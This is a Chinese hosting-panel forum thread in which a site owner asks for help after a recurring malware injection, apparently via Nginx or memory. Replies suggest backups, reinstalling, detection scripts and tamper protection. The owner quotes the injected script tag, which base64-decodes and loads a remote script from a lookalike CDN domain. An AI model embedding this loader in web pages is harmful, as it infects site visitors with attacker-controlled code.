【待反馈】本次大面积挂马没有完全被清除，还有残留，...

按照官方的指导，自己手动清理了两个木马，但是访问html文件还是有被挂马的代码，这并不是普通的文件挂马，通过查看源文件发现不了，感觉Nginx挂马没有清除干净，服务器还是存在被提权的情况。代码如下：

<script>(function() {var hm = document.createElement("script");hm.src = atob("aHR0cHM6Ly9jZG4uYm9vdHNjZG4ub3JnL2FqYXgvbGlicy9qcXVlcnkvMy42LjEvanF1ZXJ5Lmpz");var s = document.getElementsByTagName("script")[0];s.parentNode.insertBefore(hm, s);})();</script>

有没有人有相同的经历？

myboss · 发表于 2022-12-15 13:56:41

有那时间清马

都不如直接还原备份（前提这个备份，确保文件都安全）。
再有问题，直接重装系统，从头再来一遍。

他黑你，也滴从来一遍，好好分析怎么进来的，给他点措施防止再来光顾你

谢花郎 · 发表于 2022-12-15 14:21:18

您好，您可以使用下面文档内的检测脚本检查下，如果返回有提示，则根据帖子内的联系方式联系我们同事协助您溯源

https://www.bt.cn/bbs/thread-105121-1-1.html

选择很重要 · 发表于 2022-12-15 17:02:11

谢花郎发表于 2022-12-15 14:21
您好，您可以使用下面文档内的检测脚本检查下，如果返回有提示，则根据帖子内的联系方式联系我们同事协助您 ...

这个nginx的木马已经清除了我发这个好像是内存注入挂马不知道怎么解决？

选择很重要 · 发表于 2022-12-15 17:03:08

myboss 发表于 2022-12-15 13:56
有那时间清马都不如直接还原备份（前提这个备份，确保文件都安全）。
再有问题，直接重装系统，从头再 ...

重装影响太大了太麻烦...

谢花郎 · 发表于 2022-12-15 17:24:19

选择很重要发表于 2022-12-15 17:02
这个nginx的木马已经清除了我发这个好像是内存注入挂马不知道怎么解决？ ...

如果是确定注入到内存的话，可以做个定时任务去处理重启nginx

myboss · 发表于 2022-12-15 18:02:28

选择很重要发表于 2022-12-15 17:02
这个nginx的木马已经清除了我发这个好像是内存注入挂马不知道怎么解决？ ...

这马子，挺高级呀，不整个蜜罐，骗他命令，都可惜了

安装一个堡塔企业级防篡改 - 重构版，linux被攻破了，马也进不来

南南呦 · 发表于 2022-12-15 19:50:55

myboss 发表于 2022-12-15 18:02
这马子，挺高级呀，不整个蜜罐，骗他命令，都可惜了安装一个堡塔企业级防篡改 - 重构版，linux被攻 ...

感谢您的分享

【菠萝云】免费装宝塔,4G内存68	★美国CN2高防服务器★打死退款★	★香港CN2云/站群/高防/特价机★	【滴盾】高防服务器专抗DDOS	【多途云】高防CDN
高防服务器，无视一切流量攻击	SSL证书，防止数据被劫持	OV/EV SSL证书，可当日签发	宝塔一键部署DV,EV,OV,SSL证书	A10招租，联系qq394030111
★易探云.香港/美国/国内/游戏云★	【苍穹云】高性能云服务器 1.2折起	【迅线云盒】内网穿透-固定公网IP	高防服务器40核 64G 20M 199/月	【恒爱云】香港低至8元1核1G2M